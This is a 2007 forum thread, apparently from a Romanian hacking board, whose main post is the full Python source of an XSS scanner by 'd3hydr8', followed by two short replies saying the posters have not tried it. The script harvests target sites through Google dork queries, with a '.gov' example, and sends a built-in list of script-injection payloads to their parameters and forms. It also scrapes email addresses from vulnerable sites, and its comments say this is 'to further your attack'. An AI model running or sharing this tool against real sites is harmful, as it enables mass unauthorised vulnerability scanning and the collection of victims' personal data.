Ras Posted June 10, 2007 Report Posted June 10, 2007 #!/usr/bin/python#XSS Scanner that can find hosts using a google query or search one site.#If XSS is found it attempts to collect email addresses to further your attack#or warn the target of the flaw. When the scan is complete#it will print out the XSS's found and or write to file, it will find false positives#so manually check before getting to excited. It also has verbose mode and#you can change the alert pop-up message, check options!!###Changelog v1.1: added options, verbose, write to file, change alert#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)##d3hydr8[at]gmail[dot]comimport sys, urllib2, re, sets, random, httplib, time, socketdef title(): print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3" print "\t-----------------------------------------------"def usage(): title() print "\n Usage: python XSSscan.py <option>\n" print "\n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -v\n" print "\t[options]" print "\t -g/-google <query> <num of hosts> : Searches google for hosts" print "\t -s/-site <website> <port>: Searches just that site, (default port 80)" print "\t -a/-alert <alert message> : Change the alert pop-up message" print "\t -w/-write <file> : Writes potential XSS found to file" print "\t -v/-verbose : Verbose Mode\n"def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return textdef timer(): now = time.localtime(time.time()) return time.asctime(now)def geturls(query): counter = 10 urls = [] while counter < int(sys.argv[3]): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urlsdef getemails(site): try: if site.split("/",1)[0] not in done: print "\t[+] Collecting Emails:",site.split("/",1)[0] webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) done.append(site.split("/",1)[0]) if emails: return emails except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(IndexError): passdef getvar(site): names = [] actions = [] print "\n","-"*45 print "[+] Searching:",site try: webpage = urllib2.urlopen(proto+"://"+site, port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) var = re.findall("\?[\w\.\-/]*\=",webpage) if len(var) >=1: var = list(sets.Set(var)) found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower()) found_action = list(sets.Set(found_action)) if len(found_action) >= 1: for a in found_action: a = a.split('"',2)[1] try: if a[0] != "/": a = "/"+a except(IndexError): pass actions.append(a) found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower()) found_names = list(sets.Set(found_names)) for n in found_names: names.append(n.split('"',2)[1]) print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names) print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads) if len(var) >= 1: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+v+xss) for xss in xss_payloads: tester(site+"/"+v+xss) if len(names) >= 1: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss) for xss in xss_payloads: tester(site+"/"+"?"+n+"="+xss) if len(actions) != 0 and len(names) >= 1: for a in actions: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss) #tester(site.split("/")[0]+a+"?"+n+"="+xss) if len(actions) != 0 and len(var) >= 1: for a in actions: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+v+xss) else: for xss in xss_payloads: tester(site.split("/")[0]+a+v+xss) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror): if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1)def tester(target): if verbose ==1: if message != "": print "Target:",target.replace(alert ,message) else: print "Target:",target try: source = urllib2.urlopen(proto+"://"+target, port).read() h = httplib.HTTPConnection(target.split('/')[0], int(port)) try: h.request("GET", "/"+target.split('/',1)[1]) except(IndexError): h.request("GET", "/") r1 = h.getresponse() if verbose ==1: print "\t[+] Response:",r1.status, r1.reason if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418): if target not in found_xss: if message != "": print "\n[!] XSS:", target.replace(alert ,message) else: print "\n[!] XSS:", target print "\t[+] Response:",r1.status, r1.reason emails = getemails(target) if emails: print "\t[+] Email:",len(emails),"addresses\n" found_xss.setdefault(target, list(sets.Set(emails))) else: found_xss[target] = "None" except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL): pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(): passif len(sys.argv) <= 2: usage() sys.exit(1)for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-a" or arg.lower() == "-alert": message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])title()socket.setdefaulttimeout(3)found_xss = {}done = []count = 0proto = "http"alert = "D3HYDR8%2D0wNz%2DY0U"print "\n[+] XSS_scan Loaded"try: if verbose ==1: print "[+] Verbose Mode On"except(NameError): verbose = 0 print "[-] Verbose Mode Off"try: if message: print "[+] Alert:",messageexcept(NameError): print "[+] Alert:",alert message = "" passxss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", "%22%3E<IMG SRC=\"javascript:alert(%27"+alert+"%27);\">", "%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85));</script>", "'';!--\"<%27"+alert+"%27>=&{()}", "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function", "</textarea><script>alert(%27"+alert+"%27)</script>"]try: if txt: print "[+] File:",txtexcept(NameError): txt = None passprint "[+] XSS Payloads:",len(xss_payloads)if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": try: if sys.argv[3].isdigit() == False: print "\n[-] Argument [",sys.argv[3],"] must be a number.\n" sys.exit(1) else: if int(sys.argv[3]) <= 10: print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n" sys.exit(1) except(IndexError): print "\n[-] Need number of hosts to collect.\n" sys.exit(1) query = re.sub("\s","+",sys.argv[2]) port = "80" print "[+] Query:",query print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(3) while len(urls) > 0: print "-"*45 print "\n[-] Length:",len(urls),"remain" getvar(random.choice(urls))if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site": site = sys.argv[2] try: if sys.argv[3].isdigit() == False: port = "80" else: port = sys.argv[3] except(IndexError): port = "80" print "[+] Site:",site print "[+] Port:",port if site[:7] == "http://": site = site.replace("http://","") if site[:8] == "https://": proto = "https" if port == "80": print "[!] Using port 80 with https? (443)" site = site.replace("https://","") print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(4) getvar(site)print "-"*65print "\n\n[+] Potential XSS found:",len(found_xss),"\n"time.sleep(3)if txt != None and len(found_xss) >=1: xss_file = open(txt, "a") xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n") xss_file.writelines("\t------------------------------------------\n\n") print "[+] Writing Data:",txtelse: print "[-] No data written to disk"for k in found_xss.keys(): count+=1 if txt != None: if message != "": xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n") else: xss_file.writelines("["+str(count)+"] "+k+"\n") if message != "": print "\n["+str(count)+"]",k.replace(alert ,message) else: print "\n["+str(count)+"]",k addrs = found_xss[k] if addrs != "None": print "\t[+] Email addresses:" for addr in addrs: if txt != None: xss_file.writelines("\tEmail: "+addr+"\n") print "\t -",addrprint "\n[-] Done -",timer(),"\n" Quote
zbeng Posted June 10, 2007 Report Posted June 10, 2007 il am si eu da inca nu l-am probatdaca l-ai probat zimi cum iti merge? Quote
Ras Posted June 10, 2007 Author Report Posted June 10, 2007 nici eu nu l-am probat...netu imi merge praf de 2 zile... mor X( Quote